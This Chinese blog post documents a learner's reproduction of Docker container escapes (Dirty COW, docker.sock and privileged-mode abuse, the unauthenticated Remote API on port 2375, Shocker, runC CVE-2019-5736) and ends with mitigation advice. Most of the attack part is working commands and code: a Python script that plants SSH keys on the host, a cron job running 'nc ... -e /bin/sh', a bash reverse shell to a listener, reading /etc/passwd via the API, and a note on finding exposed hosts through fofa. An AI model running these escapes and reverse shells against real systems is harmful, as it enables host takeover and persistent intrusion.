本文仅作学习记录,如有侵权,请联系删除!
前言:
很早之前看过相关的文章介绍过,但是把,这知识不过脑啊,虽然还没有遇到过,还是得本地搭建环境演练并做好文字记录,然后这篇文章诞生了。
docker逃逸:
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机的文件。 它从容器中逃了出来,因此我们形象的称之为Docker逃逸漏洞。
目前的 Docker 逃逸的原因可以划分为三种:
- 1、由内核漏洞引起 ——Dirty COW(CVE-2016-5195)
- 2、由 Docker 软件设计引起——CVE-2019-5736、CVE-2019-14271
- 3、由配置不当引起——开启privileged(特权模式)+宿主机目录挂载(文件挂载)、功能(capabilities)机制、sock通信方式
docker环境检测:
- 1、是否存在.dockerenv文件
ls -alh /.dockerenv
- 2、查询系统进程的cgroup信息:
cat /proc/1/cgroup
实验环境:
宿主机:ubuntu 14.04
Docker版本:18.06.0-ce
镜像版本:ubuntu 18.04
环境搭建:
curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh
复现过程:
利用DirtyCow漏洞实现Docker逃逸(CVE-2016-5195):
利用条件:
docker与宿主机共享内核,需要存在dirtyCow漏洞的宿主机镜像。
GitHub上已有人提供了测试环境与PoC,测试容器下载并运行:
git clone https://github.com/gebl/dirtycow-docker-vdso.git
cd dirtycow-docker-vdso/
sudo docker-compose run dirtycow /bin/bash
进入容器后,编译POC并执行:
cd /dirtycow-vdso/
make
./0xdeadbeef 192.168.107.129:8888
在192.168.107.129监听本地端口:
nc -lvp 8888
复现失败,game is over!
为啥别人复现看起来顺风顺水的,我这啥也不是
在线靶场地址:https://www.ichunqiu.com/experiment/detail?id=100297&source=2
# 使用本地1234端口连接docker的1234端口运行dirtycow镜像,并将其临时命名为test
# 其中 test:为临时名称,可以自定义填写。 -p: 第一个端口为本机的端口,第二个端口为Docker的端口。 -itd:意思是在后台运行,交互式运行,并且输出当前的信息 /bin/bash:调用Shell
docker run --name=test -p 1234:1234 -itd dirtycow /bin/bash
# 进入镜像内部
docker exec -it test /bin/bash
# 编译并运行POC
cd /dirtycow-vdso/
make
./0xdeadbeef
尝试创建文件:
退出Docker,到相应目录查看是否创建成功:
成功创建文件,并且它的所属用户为root,说明成功的利用Dirty Cow实现了Docker逃逸:
挂载配置不当时的逃逸情况:
- 1、docker.sock挂载到容器内部:
Docker采用C/S架构,我们平常使用的Docker命令中,docker即为client,Server端的角色由docker daemon扮演,二者之间通信方式有以下3种:
unix:///var/run/docker.sock
tcp://host:port
fd://socketfd
其中使用docker.sock进行通信为默认方式,当容器中进程需在生产过程中与Docker守护进程通信时,容器本身需要挂载/var/run/docker.sock文件。
本质上而言,能够访问docker socket 或连接HTTPS API的进程可以执行Docker服务能够运行的任意命令,以root权限运行的Docker服务通常可以访问整个主机系统。
当容器访问docker socket时,我们可通过与docker daemon的通信对其进行恶意操纵完成逃逸。若容器A可以访问docker socket,我们便可在其内部安装client(docker),通过docker.sock与宿主机的server(docker daemon)进行交互,运行并切换至不安全的容器B,最终在容器B中控制宿主机
简单来说就是docker in docker,在docker容器中调用和执行宿主机的docker,将docker宿主机的docker文件和docker.sock文件挂载到容器中
利用过程:
- 1、运行一个挂载/var/run/的容器:
docker run -it -v /var/run/:/host/var/run/ c090eaba6b94 /bin/bash
- 2、实际过程中还得寻找挂载的sock文件:
find / -name docker.sock
- 3、在容器内安装Docker作为client(此步骤可能需要更换源):
apt-get update
apt-get install -y docker.io
- 4、查看宿主机Docker信息:
docker -H unix:///host/var/run/docker.sock info
- 5、运行一个新容器并挂载宿主机根路径,并在新容器/aa路径下完成对宿主机资源的访问:ls /aa:
docker -H unix:///host/var/run/docker.sock run -v /:/aa -it df043b4f0cf1 /bin/bash
ls /aa/
- 2、--privileged(特权模式)
使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
风险点:
当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。
- 1、以特权模式运行一个容器
docker run -it --privileged c090eaba6b94 /bin/bash
- 2、查看磁盘文件:
fdisk -l
查看/dev/路径会发现很多设备文件:
- 3、新建目录,并将/dev/sda1挂载至新建的目录:
mkdir book4yi
mount /dev/sda1 book4yi/
-
4、写入计划任务或者webshell等等
-
3、相关启动参数存在的安全问题:
--cap-add=SYS_ADMIN 启动时,允许执行mount特权操作,需获得资源挂载进行利用。
--net=host 启动时,绕过Network Namespace
--pid=host 启动时,绕过PID Namespace
--ipc=host 启动时,绕过IPC Namespace
更多不安全的配置利用可参考:一种Docker容器逃逸姿势的总结及分析
- 4、docker remote api未授权访问
docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务,可以通过HTTP、Python、调用API来操作Docker。
当使用官方推荐启动方式:
dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375
在没有其他网络访问限制的主机上使用,则会在公网暴漏端口。
在fofa上根据特定语法找到一个站点:
漏洞利用:
- 1、首先列出所有容器,得到id字段:
http://x.x.x.x:2375/containers/json
- 2、创建一个 exec,使用burp发包,得到返回的id参数:
POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188
{
"AttachStdin": true,
"AttachStdout": true,
"AttachStderr": true,
"Cmd": ["cat", "/etc/passwd"],
"DetachKeys": "ctrl-p,ctrl-q",
"Privileged": true,
"Tty": true
}
- 3、启动exec,成功执行了系统命令,读取到了passwd文件:
POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
{
"Detach": false,
"Tty": false
}
成功获取到docker主机的命令执行权限,但是还无法逃逸到宿主机。
尝试通过写计划任务或者写ssh密钥得到宿主机权限
- 1、提前在容器内安装Docker作为client(可能需要换国内源):
apt-get update
apt-get install docker.io
- 2、查看宿主机docker镜像信息:
docker -H tcp://x.x.x.x:2375 images
docker -H tcp://x.x.x.x:2375 ps -a
- 3、启动一个容器并将宿主机根目录挂在到容器的abc目录:
docker -H tcp://x.x.x.x:2375 run -it -v /:/abc 8dbd9e392a96 /bin/bash
- 4、写入计划任务、ssh密钥或者webshell等等
利用python脚本写ssh密钥:
# coding:utf-8
import docker
import socks
import socket
import sys
import re
#开启代理
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 1081)
#socks.set_default_proxy(socks.SOCKS5, '127.0.0.1', 1081)
socket.socket = socks.socksocket
ip = '172.16.145.165'
cli = docker.DockerClient(base_url='tcp://'+ip+':2375', version='auto')
#端口不一定为2375,指定version参数是因为本机和远程主机的API版本可能不同,指定为auto可以自己判断版本
image = cli.images.list()[0]
#读取生成的公钥
f = open('id_rsa_2048.pub', 'r')
sshKey = f.read()
f.close()
try:
cli.containers.run(
image=image.tags[0],
command='sh -c "echo '+sshKey+' >> /usr/games/authorized_keys"', #这里卡了很久,这是正确有效的写法,在有重定向时直接写命令是无法正确执行的,记得加上sh -c
volumes={'/root/.ssh':{'bind': '/usr/games', 'mode': 'rw'}}, #找一个基本所有环境都有的目录
name='test' #给容器命名,便于后面删除
)
except docker.errors.ContainerError as e:
print(e)
#删除容器
try:
container = cli.containers.get('test')
container.remove()
except Expection as e:
continue
写计划任务(by P牛):
import docker
client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
Docker 软件设计引起的逃逸:
- 1、Shocker 攻击
通过调用open_by_handle_at函数对宿主机文件系统进行暴力扫描,以获取宿主机的目标文件内容。由于Docker1.0之前版本对容器能力(Capability)使用黑名单策略进行管理,并没有限制CAP_DAC_READ_SEARCH能力,赋予了shocker.c程序调用open_by_handle_at函数的能力,导致容器逃逸的发生。
影响版本:
Docker版本< 1.0, 存在于 Docker 1.0 之前的绝大多数版本。
项目地址:https://github.com/gabrtv/shocker
- 2、runC容器逃逸漏洞(CVE-2019-5736)
漏洞成因:
runC是一个低级容器,像Docker这种高级容器在运行时可以使用runC来处理与其他运行容器之间的任务等。Docker 18.09.2之前的版本中使用的runC版本小于1.0-rc6,攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并重写其二进制文件,从而获取到宿主机的root权限。
影响版本:
Docker版本 < 18.09.2,runc版本< 1.0-rc6
可通过 docker 和docker-runc 查看当前版本情况。
测试环境下载:
curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh
利用过程:
# 下载poc
git clone https://github.com/Frichetten/CVE-2019-5736-PoC
# 修改Payload
vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.107.129/6666 0>&1"
# 编译生成payload
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
# 拷贝到docker容器中执行
sudo docker cp ./main 335d6c6c60db:/tmp
在容器中执行payload
# 进入容器
docker start 335d6c6c60db
docker exec -it 335d6c6c60db /bin/bash
# 修改权限
chmod 777 main
# 执行Payload
./main
然后就是漫长的等待,直到管理员通过exec进入容器,从而触发Payload:
docker exec -it 335d6c6c60db /bin/bash
防范手段:
1、更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736
2、runc版本 > 1.0-rc6
3、k8s 集群版本>1.12
4、Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
5、Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险
6、不建议以root权限运行Docker服务
7、不建议以privileged(特权模式)启动Docker
8、不建议将宿主机目录挂载至容器目录
9、不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险
篇幅原因CVE-2020-15257不进行复现,详情请参考:发现一款容器逃逸漏洞利用神器!
感谢各位表哥的无私分享!!
参考如下:
Ubuntu 16.04安装docker及docker-compose详细步骤
初识Docker逃逸
干货来啦!带你初探Docker逃逸
利用Dirty Cow实现Docker逃逸
技术干货 | Docker 容器逃逸案例汇集
Docker逃逸在实战中的利用
安全实验室 | Docker逃逸原理
网友评论